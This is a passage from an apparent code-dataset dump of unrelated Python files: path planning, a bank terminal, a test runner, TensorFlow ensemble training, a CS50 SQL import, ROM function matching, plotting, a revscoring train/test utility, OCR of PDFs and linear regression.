LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER\n * DEALINGS IN THE SOFTWARE.\n\"\"\"\n\n# header files\nfrom utils import *\nimport sys\n\n# take start and goal node as input\nstartRow = int(input(\"Enter the row coordinate for start node (between 1 and 200) : \"))\nstartCol = int(input(\"Enter the column coordinate for start node (between 1 and 300) : \"))\ngoalRow = int(input(\"Enter the row coordinate for goal node (between 1 and 200) : \"))\ngoalCol = int(input(\"Enter the column coordinate for goal node (between 1 and 300) : \"))\n\n# define constants\nstart = (startRow, startCol)\ngoal = (goalRow, goalCol)\nclearance = 0\nradius = 0\ndijkstra = Dijkstra(start, goal, clearance, radius)\n\nif(dijkstra.IsValid(start[0], start[1])):\n\tif(dijkstra.IsValid(goal[0], goal[1])):\n\t\tif(dijkstra.IsObstacle(start[0],start[1]) == False):\n\t\t\tif(dijkstra.IsObstacle(goal[0], goal[1]) == False):\n\t\t\t\t(explored_states, backtrack_states, distance_from_start_to_goal) = dijkstra.Dijkstra()\n\t\t\t\tdijkstra.animate(explored_states, backtrack_states, \"./dijkstra_point.avi\")\n\t\t\t\t# print optimal path found or not\n\t\t\t\tif(distance_from_start_to_goal == float('inf')):\n\t\t\t\t\tprint(\"\\nNo optimal path found.\")\n\t\t\t\telse:\n\t\t\t\t\tprint(\"\\nOptimal path found. Distance is \" + str(distance_from_start_to_goal))\n\t\t\telse:\n\t\t\t\tprint(\"The entered goal node is an obstacle \")\n\t\t\t\tprint(\"Please check README.md file for running Dijkstra_point.py file.\")\n\t\telse:\n\t\t\tprint(\"The entered initial node is an obstacle \")\n\t\t\tprint(\"Please check README.md file for running Dijkstra_point.py file.\")\n\telse:\n\t\tprint(\"The entered goal node outside the map \")\n\t\tprint(\"Please check README.md file for running Dijkstra_point.py file.\")\nelse:\n\tprint(\"The entered initial node is outside the map \")\n\tprint(\"Please check README.md file for running Dijkstra_point.py file.\")\n","sub_path":"codes/Dijkstra_point.py","file_name":"Dijkstra_point.py","file_ext":"py","file_size_in_byte":2893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"263630039","text":"def start_session() -> bool:\n \"\"\"Запустить терминал.\"\"\"\n status = input('Запустить терминал? y/n: ')\n if status == 'y':\n status = True\n if status == 'n':\n status = False\n return status\n\n\ndef display_board() -> None:\n \"\"\"Терминал с информацией.\"\"\"\n print('Добро пожаловать!')\n print('Выберете цифру для проведения операции')\n\n print('1 -> стать клиентом банка')\n print('2 -> вывести баланс')\n print('3 -> пополнить баланс')\n print('4 -> снять с баланса')\n print('5 -> завершить сеанс')\n\n\ndef set_operation() -> int:\n \"\"\"Выбрать операцию.\"\"\"\n choice = int(input('Операция: '))\n return choice\n\n\ndef clients_dict(clients: dict, id: int, name: str, balance: float) -> dict:\n \"\"\"Словарь клиентов\"\"\"\n clients[id] = {name: balance}\n return clients\n\n\ndef write_account_info(id: int, name: str, balance: float) -> None:\n filename = 'accounts.txt'\n with open(filename, 'a') as f:\n f.write(str(id))\n f.write(name)\n f.write(str(balance))\n\n\ndef read_account_info(id: int, name: str, balance: float) -> None:\n filename = 'accounts.txt'\n with open(filename) as f:\n f.readlines()\n\n\ndef get_name() -> str:\n \"\"\"Запрашивает и возвращает имя клиента.\"\"\"\n name = input('Введите имя: ')\n print(f'Имя: {name} введено.')\n return name","sub_path":"back_account/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"362091153","text":"#-*- coding:utf-8 -*-\nimport unittest\nimport time\nfrom common import HTMLTestRunnerPlugins\nfrom common import sendEmail\nimport getpathInfo\n# from common import readConfig\n\n# read_conf = readConfig.ReadConfig()\non_off = 'on'\n\n# 获取测试用例的文件夹\ncase_dir = './testcase'\n\n# 建立测试报告存放路径\nreport_dir = './report'\n\n# 将需要执行的测试用例添加到测试套件中\ndiscover = unittest.defaultTestLoader.discover(case_dir, pattern=\"test_*\")\n\n# 规定生成测试报告的格式\nnow = time.strftime(\"%Y_%m_%d %H_%M\")\nfile = open(report_dir + '\\\\' + 'report.html', 'wb')\n\n# 实例化对象\nrunner = HTMLTestRunnerPlugins.HTMLTestRunner(\n stream=file,\n title='接口自动化测试报告',\n description='预约--接待--咨询--开单--缴费--核销--出库'\n '报备增删改查-预约增删改查-接待增删改查-咨询增删改查-面诊增删改查',\n verbosity=2,\n retry=0\n )\n\nrunner.run(discover)\nfile.close()\nif on_off == 'on':\n send = sendEmail.SendEmail().sendEmail()\nelse:\n print(\"请在配置中打开发送邮箱开关\")\n","sub_path":"RunAllCase.py","file_name":"RunAllCase.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"69671624","text":"import tensorflow as tf\nimport res18\nimport vgg16\nimport data_csv as data\nimport configure as cf\nimport csv\nimport numpy as np\nimport os\nimport random\n\n#test all the training set using model1, to make next beg.\nf_log = open(cf.TRA_LOG, 'w', newline = '')\nlog_wr = csv.writer(f_log)\nf_beg_pool = open('beg_pool.csv', 'w', newline='')\nbeg_pool_wr = csv.writer(f_beg_pool)\n\n#test_sz set\ntest_sz = 0\nf_temp = open(cf.TRA_CSV, 'r')\nrdr_temp = csv.reader(f_temp)\nfor line in rdr_temp:\n test_sz = test_sz + 1\n beg_pool_wr.writerow(line)\nf_temp.close()\nprint(\"test sz : \" + str(test_sz))\n\nsess = tf.Session()\n\n#model1, model2 build\nimages_model1 = tf.placeholder(tf.float32, [None, 224, 224, 3])\nimages_model2 = tf.placeholder(tf.float32, [None, 224, 224, 3])\nanswers_model1 = tf.placeholder(tf.float32, [None, cf.CLS_NUM])\nanswers_model2 = tf.placeholder(tf.float32, [None, cf.CLS_NUM])\ntrain_mode_model1 = tf.placeholder(tf.bool)\ntrain_mode_model2 = tf.placeholder(tf.bool)\n#model1, test\nnet_model1 = res18.Network(cf.MODEL1_TES_CKPT_PATH, trainable=False, fine_tuning=False)\nnet_model1.build(images_model1, train_mode_model1)\n#model2, train\nnet_model2 = vgg16.Network(cf.MODEL2_TRA_CKPT_PATH, trainable=cf.MODEL2_TRAINABLE, fine_tuning=cf.MODEL2_FINE_TUNING)\nnet_model2.build(images_model2, train_mode_model2)\ncross_entropy = tf.nn.softmax_cross_entropy_with_logits(labels=answers_model2, logits=net_model2.fc8_d1)\nloss = tf.reduce_mean(cross_entropy) \noptimizer = tf.train.AdamOptimizer(cf.LEARNING_RATE).minimize(loss)\n\n\ndt_model1 = data.Data(cf.TRA_IMG_PATH, cf.TRA_CSV, oversampling=False, batch_size = cf.BATCH_SIZE)\n\nsess.run(tf.global_variables_initializer())\n\n#restore weights\n\nvar_list1 = net_model1.build_tensors()\nvar_list2 = net_model2.build_tensors()\n\nloader1 = tf.train.Saver(var_list1)\nloader2 = tf.train.Saver(var_list2)\n\nloader1.restore(sess, cf.MODEL1_TES_CKPT_PATH)\nloader2.restore(sess, cf.MODEL2_TRA_CKPT_PATH)\n\n#mode set!, make new beg\nend = int(test_sz/cf.BATCH_SIZE) \n\nfor i in range(0, end):\n im_list, la_list, nm_list = dt_model1.get_batch()\n r1, r2 = sess.run([net_model1.prob, net_model1.fc8_d1], feed_dict={images_model1: im_list, train_mode_model1:False})\n l, clsnum = la_list.shape \n cnt = 0\n for j in range(0, l): #make batch for next model train, the \n #print(nm_list[j] + \", ans : \" + str(np.argmax(la_list[j])) +\", inference : \" + str(np.argmax(r1[j])))\n lab = np.argmax(la_list[j])\n inf = np.argmax(r1[j])\n if lab!=inf: #inference isn't correct => to batch. this may be changed for machine perfomance. (ex) thresh hold.\n for k in range(0, cf.BEG_WEIGHT-1):\n beg_pool_wr.writerow([nm_list[j], lab])\n else: #correct!\n if r1[j][inf] < cf.RANK1_THRESH_HOLD: #too small\n for k in range(0, cf.BEG_WEIGHT-1):\n beg_pool_wr.writerow([nm_list[j], lab])\n cnt = cnt+1\n print(str(i)+\" batch accuracy : \"+str(cnt/cf.BATCH_SIZE))\n\nf_beg_pool.close()\nprint(\"beg_pool is made completely!\")\n\n#set for beg making\nf_beg_pool = open('beg_pool.csv', 'r')\nbeg_pool_rdr = csv.reader(f_beg_pool)\nf_beg = open('beg.csv', 'w', newline='')\nf_beg_wr = csv.writer(f_beg)\n#start\nnum = test_sz\nname_list = []\nlabel_list = []\n\nfor line in beg_pool_rdr:\n name_list.append(line[0])\n label_list.append(int(line[1]))\nf_beg_pool.close()\n\nrand_idx = random.sample(range(len(label_list)), len(label_list))\nlimit = int(num*cf.BEG_RATIO)\ncnt = 0\nfor i in range(0, len(name_list)):\n if cnt == limit:\n break\n idx = rand_idx[i]\n label = int(label_list[idx])\n cnt = cnt + 1\n f_beg_wr.writerow([name_list[idx], label])\n\ndel name_list\ndel rand_idx\ndel dt_model1\ndel label_list \n\nf_beg.close()\nprint(\"beg is made completely!, and model2 start training!\")\ndt_model2 = data.Data(cf.TRA_IMG_PATH, 'beg.csv', oversampling=False, batch_size = cf.BATCH_SIZE)\ndt2_model2 = data.Data(cf.VAL_IMG_PATH, cf.VAL_CSV, oversampling=False, batch_size = cf.BATCH_SIZE)\nfor i in range(0, cf.ITER):\n if(i%cf.SAVE_ITER == 0)and(i!=0):\n print(\"trying to saving...\")\n net_model2.save_model(sess, i)\n im_list, la_list, nm_list = dt_model2.get_batch()\n r1, r2, r0= sess.run([optimizer, loss, net_model2.prob], feed_dict={images_model2: im_list, answers_model2: la_list, train_mode_model2:True})\n tra_cnt = 0\n for j in range(0, cf.BATCH_SIZE):\n inf = np.argmax(r0[j])\n lab = np.argmax(la_list[j])\n if inf == lab:\n tra_cnt = tra_cnt + 1\n im_list_val, la_list_val, name_list_val = dt2_model2.get_batch()\n vr0, vr1 = sess.run([net_model1.fc8_d1, net_model1.prob], feed_dict={images_model1: im_list_val, train_mode_model1:False})\n infer_list = [-1] * cf.BATCH_SIZE\n idx_list_next = []\n im_list_next = []\n batch_sz_next = 0\n cnt = 0\n for j in range(0, cf.BATCH_SIZE): #model 1 inference\n infer = np.argmax(vr1[j])\n if vr1[j][infer] < cf.RANK1_THRESH_HOLD:\n idx_list_next.append(j)\n im_list_next.append(im_list_val[j].reshape(1, 224, 224, 3))\n batch_sz_next = batch_sz_next + 1\n else:\n infer_list[j] = infer\n if batch_sz_next != 0: #model 2 in\n im_list_next = np.concatenate(im_list_next)\n print(im_list_next.shape)\n vr3, vr4 = sess.run([net_model2.prob, net_model2.fc8_d1], feed_dict={images_model2: im_list_next, train_mode_model2:False})\n for j in range(0, batch_sz_next):\n infer = np.argmax(vr3[j])\n infer_list[idx_list_next[j]] = np.argmax(vr3[j])\n for j in range(0, cf.BATCH_SIZE):\n ans = np.argmax(la_list_val[j])\n if ans==infer_list[j]:\n cnt = cnt+1\n acr = (cnt * 100) / cf.BATCH_SIZE\n print(\"iteration \"+ str(i)+\" => loss : \" + str(r2)+\", val accuraccy : \" +str(acr)+\", model2 tra accuracy : \"+str(tra_cnt*100/cf.BATCH_SIZE))\n log_wr.writerow([i, r2, acr, tra_cnt*100/cf.BATCH_SIZE])\n \nf_log.close()\n#remove all created additional file\n#os.remove('beg_pool.csv')\nos.remove('beg.csv')","sub_path":"diff_ensemble_train.py","file_name":"diff_ensemble_train.py","file_ext":"py","file_size_in_byte":5958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"319882489","text":"from sys import argv\nimport cs50\nimport csv\n\n## If incorect number of command_line arguments\nif len(argv) != 2:\n print(\"Missing command-line argument\")\n exit(1)\n\n## Connect to database\ndb = cs50.SQL(\"sqlite:///students.db\")\n\n## Open CSV file \nwith open(argv[1], \"r\") as characters_csv:\n \n ## Create DictReadeer\n students = csv.DictReader(characters_csv)\n \n ## Iterate over csv file\n for row in students:\n \n ## Split the name string into a list of names \n name = row[\"name\"].split()\n \n ## If character has middle name \n if len(name) == 3:\n db.execute(\"INSERT INTO students (first, middle, last, house, birth) VALUES (?, ?, ?, ?, ?)\", \n name[0], name[1], name[2], row[\"house\"], row[\"birth\"])\n \n ## If character has no middle name\n elif len(name) == 2:\n db.execute(\"INSERT INTO students (first, middle, last, house, birth) VALUES (?, ?, ?, ?, ?)\", \n name[0], None, name[1], row[\"house\"], row[\"birth\"])","sub_path":"XN/pset7/houses/import.py","file_name":"import.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"91125664","text":"#!/usr/bin/python3\nFOLDER_PATH = 'obj/'\nROM_PATH = '../rom.bin'\n\nimport sys\nsys.path.append('..')\nfrom parse_obj import parse_data\nimport os\n\nwith open(ROM_PATH, 'rb') as rom_file:\n\trom = rom_file.read()\n\na = set()\n\nfor file in os.listdir(os.fsencode(FOLDER_PATH)):\n\tfilename = os.fsdecode(file)\n\twith open(FOLDER_PATH + filename, 'rb') as obj_file:\n\t\tdata = parse_data(obj_file.read(), print = lambda x:0)\n\tfor obj_id, obj_name in data['nameof_export'].items():\n\t\tif 'fn' not in data['typeof_export'][obj_id]:\n\t\t\tcontinue\n\t\tfn_code = data[\"obj_data\"][obj_id]\n\t\tfn_len = len(fn_code)\n\n\t\tmatches = []\n\t\tfor i in range(0, len(rom)-fn_len, 2):\n\t\t\t'''\n\t\t\tTry matching 'rom[i:i+fn_len]' with fn_code.\n\t\t\tThe algorithm used here is not 100% accurate (it should\n\t\t\tonly match if the 00-00 comes after a L/ST/SB/TB/RB/\n\t\t\tLEA/B/BL) (see 'out.asm' for more details)\n\t\t\tbut hopefully it's accurate enough.\n\n\t\t\tThis is not the most efficient possible algorithm but\n\t\t\tit runs fast enough (48.5s on my machine).\n\t\t\t'''\n\t\t\tfor j in range(0, fn_len, 2):\n\t\t\t\tif not (\n\t\t\t\t\trom[i+j:i+j+2] == fn_code[j:j+2] or\n\t\t\t\t\tfn_code[j:j+2] == b'\\x00\\x00' or\n\t\t\t\t\t(\n\t\t\t\t\t\tj+2 != fn_len and\n\t\t\t\t\t\tfn_code[j+2:j+4] == b'\\x00\\x00' and\n\t\t\t\t\t\trom[i+j] == fn_code[j] and\n\t\t\t\t\t\t(rom[i+j+1]^fn_code[j+1])&0xf0 == 0\n\t\t\t\t\t)\n\t\t\t\t): break\n\t\t\telse: # cannot found any mismatch\n\t\t\t\tif matches:\n\t\t\t\t\t# multiple matches = bad\n\t\t\t\t\tmatches = []\n\t\t\t\t\tbreak\n\t\t\t\tmatches.append(i)\n\n\t\tif matches:\n\t\t\tprint(f'Fn {obj_name}, adr {hex(matches[0])[2:]}')\n","sub_path":"wine_tools/parse_all_obj.py","file_name":"parse_all_obj.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"207586563","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport matplotlib as mpl\nfrom matplotlib.font_manager import FontManager\n\ncustom_font = mpl.font_manager.FontProperties(fname=r\"C:\\Windows\\Fonts\\simhei.ttf\", size=14)\nfont_size = 10\nfig_size = (8, 6)\nnames = (u'粒子群算法', u'人工蜂群算法')\nsubjects = (u'100', u'200', u'300')\nscores = ((26.2, 52.4, 79.4), (20.5, 46.8, 61.5))\nmpl.rcParams['font.size'] = font_size\nmpl.rcParams['figure.figsize'] = fig_size\nbar_width = 0.30\nindex = np.arange(len(scores[0]))\nrects1 = plt.bar(index, scores[0], bar_width, color='#0072BC', label=names[0])\nrects2 = plt.bar(index + bar_width, scores[1], bar_width, color='#ED1C24', label=names[1])\nplt.xticks(index + bar_width, subjects, fontProperties=custom_font)\nplt.ylim(ymax=100, ymin=0)\nplt.xlabel(u'任务数量', fontProperties=custom_font)\nplt.ylabel(u'任务执行时间', fontProperties=custom_font)\nplt.title(u'任务调度', fontProperties=custom_font)\nplt.legend(fancybox=True, prop=custom_font)\n\n\ndef add_labels(rects):\n for rect in rects:\n height = rect.get_height()\n plt.text(rect.get_x() + rect.get_width() / 2, height, height, ha='center', va='bottom')\n rect.set_edgecolor('white')\n\n\nadd_labels(rects1)\nadd_labels(rects2)\n\nplt.savefig('scores_par.png')\nplt.show()\n","sub_path":"two/Utils/learn3.py","file_name":"learn3.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"398398589","text":"\"\"\"\n``revscoring train_test -h``\n::\n\n Trains and tests a scorer model. This utility expects to get a file of\n tab-separated feature values and labels from which to construct a model.\n\n Usage:\n train_test -h | --help\n train_test [-p=]...\n [--version=]\n [--values-labels=]\n [--model-file=]\n [--label-type=]\n\n Options:\n -h --help Prints this documentation\n Classpath to an the MLScorerModel to construct\n and train\n Classpath to an list of features to use when\n constructing the model\n -p --parameter= A key-value argument pair to use when\n constructing the scorer_model.\n --version= A version to associate with the model\n --values-labels= Path to a file containing feature values and\n labels [default: ]\n --model-file= Path to write a model file to\n [default: ]\n --label-type= Interprets the labels as the appropriate type\n (int, float, str, bool) [default: str]\n\"\"\"\nimport json\nimport pprint\nimport random\nimport sys\n\nimport docopt\nfrom tabulate import tabulate\n\nfrom .util import encode, import_from_path\n\n\ndef main(argv=None):\n args = docopt.docopt(__doc__, argv=argv)\n\n ScorerModel = import_from_path(args[''])\n features = import_from_path(args[''])\n\n version = args['--version']\n\n model_kwargs = {}\n for parameter in args['--parameter']:\n key, value = parameter.split(\"=\")\n model_kwargs[key] = json.loads(value)\n\n scorer_model = ScorerModel(features, version=version, **model_kwargs)\n\n if args['--values-labels'] == \"\":\n values_labels_file = sys.stdin\n else:\n values_labels_file = open(args['--values-labels'], 'r')\n\n if args['--model-file'] == \"\":\n model_file = sys.stdout.buffer\n else:\n model_file = open(args['--model-file'], 'wb')\n\n decode_label = DECODERS[args['--label-type']]\n\n feature_labels = read_value_labels(values_labels_file,\n scorer_model.features,\n decode_label)\n\n run(feature_labels, model_file, scorer_model)\n\nDECODERS = {\n 'int': lambda v: int(v),\n 'float': lambda v: float(v),\n 'str': lambda v: str(v),\n 'bool': lambda v: v in (\"True\", \"true\", \"1\", \"T\", \"y\", \"Y\")\n}\n\ndef read_value_labels(f, features, decode_label):\n for line in f:\n parts = line.strip().split(\"\\t\")\n values = parts[:-1]\n label = parts[-1]\n\n label = decode_label(label)\n\n feature_values = []\n for feature, value in zip(features, values):\n\n if feature.returns == bool:\n feature_values.append(value == \"True\")\n else:\n feature_values.append(feature.returns(value))\n\n yield feature_values, label\n\ndef run(feature_labels, model_file, scorer_model):\n\n feature_labels = list(feature_labels)\n random.shuffle(feature_labels)\n\n test_set_size = int(0.6*len(feature_labels))\n test_set = feature_labels[:test_set_size]\n train_set = feature_labels[test_set_size:]\n\n scorer_model.train(train_set)\n\n stats = scorer_model.test(test_set)\n\n possible = list(set(actual for _, actual in stats['table'].keys()))\n possible.sort()\n\n sys.stderr.write(\"Accuracy: {0}\\n\\n\".format(stats['accuracy']))\n if 'auc' in stats['roc']:\n sys.stderr.write(\"ROC-AUC: {0}\\n\\n\".format(stats['roc']['auc']))\n else:\n sys.stderr.write(\"ROC-AUC:\\n\")\n\n\n table_data = [[comparison_label, stats['roc'][comparison_label]['auc']]\n for comparison_label in possible]\n sys.stderr.write(tabulate(table_data))\n sys.stderr.write(\"\\n\\n\")\n\n\n table_data = []\n\n for actual in possible:\n table_data.append([actual] +\n [stats['table'].get((predicted, actual), 0)\n for predicted in possible])\n sys.stderr.write(tabulate(table_data, headers=possible))\n sys.stderr.write(\"\\n\\n\")\n\n scorer_model.dump(model_file)\n","sub_path":"revscoring/utilities/train_test.py","file_name":"train_test.py","file_ext":"py","file_size_in_byte":4436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"608364176","text":"import matplotlib.pyplot as plt\nimport tensorflow as tf\nimport os\nimport skimage\nimport numpy as np\nimport pytesseract\n\nfrom PIL import Image\nimport PIL.Image\nfrom PIL import Image\nfrom pytesseract import image_to_string\nimport pytesseract\nimport cv2\nimport os\nimport tempfile\nfrom pdf2image import convert_from_path\nimport imutils\n\n\n''' PART 1: CONVERT PDF TO IMAGE'''\n\ndatafile = \"27A01-30006-21_F6137-3\"\nsave_dir = '/home/greggas/Downloads/SatAir/'\nfilename = save_dir + datafile + \".pdf\"\n\nwith tempfile.TemporaryDirectory() as path:\n images_from_path = convert_from_path(filename, output_folder=path, last_page=1, first_page=0)\n\nbase_filename = os.path.splitext(os.path.basename(filename))[0] + '.jpg'\n\n\n\n\nfor page in images_from_path:\n page.save(os.path.join(save_dir, base_filename), 'JPEG')\n\n\n\n\n\n'''PART 2: CORRECT ORIENTATION OF IMAGE'''\n# convert the image to grayscale and flip the foreground\n# and background to ensure foreground is now \"white\" and\n# the background is \"black\"\nfilename = save_dir + datafile + \".jpg\"\nimage = cv2.imread(filename)\nscale_percent = 40 # percent of original size\nwidth = int(image.shape[1] * scale_percent / 100)\nheight = int(image.shape[0] * scale_percent / 100)\ndim = (width, height)\n# resize image\nimage = cv2.resize(image, dim, interpolation = cv2.INTER_AREA)\nblur = cv2.blur(image,(5,5))\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n#cv2.imshow('gray',gray)\n#gray = cv2.bitwise_not(gray)\n'''\nh,w, d = image.shape\nimage2 = cv2.CreateMat(h, w, cv2.CV_32FC3)\nimage = cv2.fromarray(image2)\ncv2.CvtColor(image, image, cv2.CV_GRAY2BGR)\n'''\n#image = cv2.fromarray(image)\n# threshold the image, setting all foreground pixels to\n# 255 and all background pixels to 0\n#thresh = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n\n\n#print(type(image))\nedges = cv2.Canny(gray,50,100,apertureSize = 3)\nkernel = np.ones((2,2),np.uint8)\ndilation = cv2.dilate(edges,kernel,iterations = 2)\ncv2.imshow('edges',edges)\nminLineLength = 3000\nmaxLineGap = 100\nimgCopy = image.copy()\nlines = cv2.HoughLinesP(edges,1,np.pi/180,100,minLineLength,maxLineGap)\n#print(lines)\nfor l in lines:\n cv2.line(image,(l[0][0],l[0][1]),(l[0][2],l[0][3]),(0,255,0),2)\n\ncv2.imshow('houghlines',image)\n\n\n# load the image and define the window width and height\n\n(winW, winH) = (300, 60)\n\n# loop over the image pyramid\nwordToSearch = \"Harmonised\"\nfor resized in pyramid(image, scale=1.5):\n\t# loop over the sliding window for each layer of the pyramid\n\n for (x, y, window) in sliding_window(resized, stepSize=50, windowSize=(winW, winH)):\n\n # if the window does not meet our desired window size, ignore it\n if window.shape[0] != winH or window.shape[1] != winW:\n continue\n #startTime = time.time()\n # THIS IS WHERE YOU WOULD PROCESS YOUR WINDOW, SUCH AS APPLYING A\n # MACHINE LEARNING CLASSIFIER TO CLASSIFY THE CONTENTS OF THE\n # WINDOW\n\n # since we do not have a classifier, we'll just draw the window\n clone = resized.copy()\n crop_img = clone[y:y + winH, x:x + winW]\n ret, crop_img = cv2.threshold(crop_img,127,255,cv2.THRESH_BINARY)\n kernel = np.ones((1, 1), np.uint8)\n crop_img = cv2.dilate(crop_img, kernel, iterations=2)\n #crop_img = cv2.threshold(crop_img, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n cv2.imshow(\"cropped\", crop_img)\n cv2.rectangle(clone, (x, y), (x + winW, y + winH), (0, 255, 0), 2)\n output = image_to_string(crop_img, lang='eng')\n print(output)\n if wordToSearch in output:\n print(\"Searched string found!! Output = \", output, \"wordToSearch = \", wordToSearch)\n #endTime = time.time()\n #print(\"Time taken = \", endTime - startTime)\n\n cv2.imshow(\"Window\", clone)\n cv2.waitKey(100)\n #time.sleep(0.00001)\n\n# Display Results\n#imgCopy = cv2.imread(\"/home/greggas/PycharmProjects/Personal/venv/lib/python3.5/site-packages/pytesseract/test.png\")\ncv2.imshow('imgCopy',imgCopy)\n# output = image_to_string(imgCopy, lang='eng')\n# print(output)\ncv2.waitKey()\n\n\n\n'''\nkernel = np.ones((1,1),np.uint8)\nerosion = cv2.erode(thresh,kernel,iterations = 1)\n\ncv2.imshow(\"erosion\", erosion)\ncv2.imshow(\"thresh\", thresh)\n# grab the (x, y) coordinates of all pixel values that\n# are greater than zero, then use these coordinates to\n# compute a rotated bounding box that contains all\n# coordinates\n\n\n# convert the resized image to grayscale, blur it slightly,\n# and threshold it\n\n\n\ngray = cv2.cvtColor(thresh, cv2.COLOR_BGR2GRAY)\nblurred = cv2.GaussianBlur(gray, (5, 5), 0)\nthresh = cv2.threshold(blurred, 60, 255, cv2.THRESH_BINARY)[1]\n\n# find contours in the thresholded image and initialize the\n# shape detector\ncontours = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_SIMPLE)\ncontours = imutils.grab_contours(contours)\nmax = 150\nmin = 15\nprint(\"len(contours) = \", len(contours))\nfor c in contours:\n area = cv2.contourArea(c)\n\n if(area < max and area > min):\n print(\"\\nContour is : \", c)\n print(\"Area = \", area)\n cv2.drawContours(image, [c], -1, (0, 255, 0), 2)\n\t# compute the center of the contour, then detect the name of the\n\t# shape using only the contour\n\n\n\ncv2.imshow(\"Image\", image)\ncv2.waitKey()\n\n\n\n\n\ncoords = np.column_stack(np.where(thresh > 0))\nangle = cv2.minAreaRect(coords)[-1]\n\n# the `cv2.minAreaRect` function returns values in the\n# range [-90, 0); as the rectangle rotates clockwise the\n# returned angle trends to 0 -- in this special case we\n# need to add 90 degrees to the angle\nif angle < -45:\n angle = -(90 + angle)\n\n# otherwise, just take the inverse of the angle to make\n# it positive\nelse:\n angle = -angle\n\n# rotate the image to deskew it\n(h, w) = image.shape[:2]\ncenter = (w // 2, h // 2)\nM = cv2.getRotationMatrix2D(center, angle, 1.0)\nrotated = cv2.warpAffine(image, M, (w, h),\n flags=cv2.INTER_CUBIC, borderMode=cv2.BORDER_REPLICATE)\n\n\n# draw the correction angle on the image so we can validate it\ncv2.putText(rotated, \"Angle: {:.2f} degrees\".format(angle),\n (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\n\n# show the output image\nprint(\"[INFO] angle: {:.3f}\".format(angle))\ncv2.imshow(\"Input\", image)\ncv2.imshow(\"Rotated\", rotated)\ncv2.waitKey()\n\n'''\n# Loop over Image and Segment\n'''\nyDirectionPercent = 0.02\nyDirectionStep = int(yDirectionPercent * imgCopy.shape[0])\nxDirectionPercent = 0.02\nxDirectionStep = int(xDirectionPercent * imgCopy.shape[1])\nwindowSize = [0.05*imgCopy.shape[1],0.05*imgCopy.shape[0]]\nprint(imgCopy.shape)\nfor y in range(0, imgCopy.shape[0], yDirectionStep):\n for x in range(0, imgCopy.shape[1], xDirectionStep):\n startX = x\n endX = x + windowSize[0]\n startY = y\n endY = y + windowSize[1]\n if window.shape[0] != winH or window.shape[1] != winW:\n continue\n subWindow = sliding_window(imgCopy,xDirectionStep, windowSize)\n print((subWindow))\n cv2.imshow('subWindow', subWindow)\n cv2.waitKey()\n'''\n\n'''\n# Helper Functions\ndef slidingWindow(x,y,img,windowsize):\n yield (x, y, img[y:y + windowSize[1], x:x + windowSize[0]])\n'''\n#pytesseract.pytesseract.tesseract_cmd = 'C:/Program Files (x86)/Tesseract-OCR/tesseract'\n#TESSDATA_PREFIX = 'C:/Program Files (x86)/Tesseract-OCR'\n#pytesseract.pytesseract.tesseract_cmd = 'C:/Program Files (x86)/Tesseract-OCR/tesseract'\n#TESSDATA_PREFIX = 'C:/Program Files (x86)/Tesseract-OCR'\n\n#imgCopy = cv2.imread(\"/home/greggas/PycharmProjects/Personal/venv/lib/python3.5/site-packages/pytesseract/test.png\")\ncv2.imshow('imgCopy',imgCopy)\noutput = image_to_string(imgCopy, lang='eng')\nprint(output)\ncv2.waitKey()","sub_path":"PDF_Reader/PDF_test.py","file_name":"PDF_test.py","file_ext":"py","file_size_in_byte":7720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"370504076","text":"import numpy as np\nfrom featureNormalize import normal\nimport matplotlib.pyplot as plt\nimport scipy.optimize as op\nfrom computeCost import computeCost\nfrom gradientDescent import gradientDescent,costFunction,gradient\nfrom normalEqn import normalEql\nplt.rcParams['font.sans-serif']=['SimHei']\nplt.rcParams['axes.unicode_minus']=False\ndataset = np.loadtxt('ex1data2.txt', delimiter=',', usecols=(0,1,2))\nX1=dataset[:,0:2]\nY1=dataset[:,2:]\ntheta1=np.zeros((3,1))\nX,xmean,xstd,Y,ymean,ystd=normal(X1,Y1)\nY=Y.reshape((Y.size,1))\nX=np.hstack((np.ones((len(X),1)),X))\nalpha=0.05\niters=300\ntheta,J_history=gradientDescent(X,Y,theta1,alpha,iters)\nJ_history2=gradientDescent(X,Y,theta1,0.01,iters)[1]\nJ_history3=gradientDescent(X,Y,theta1,0.1,iters)[1]\nJ_history4=gradientDescent(X,Y,theta1,0.3,iters)[1]\nplt.figure()\n#损失值与迭代次数关系图\na = np.array(np.arange(1, iters+1).reshape(300,1))\nplt.title('梯度下降')\nplt.plot(a, J_history, 'r-')\nplt.plot(a, J_history2, 'b-')\nplt.plot(a, J_history3, 'k-')\nplt.plot(a, J_history4, 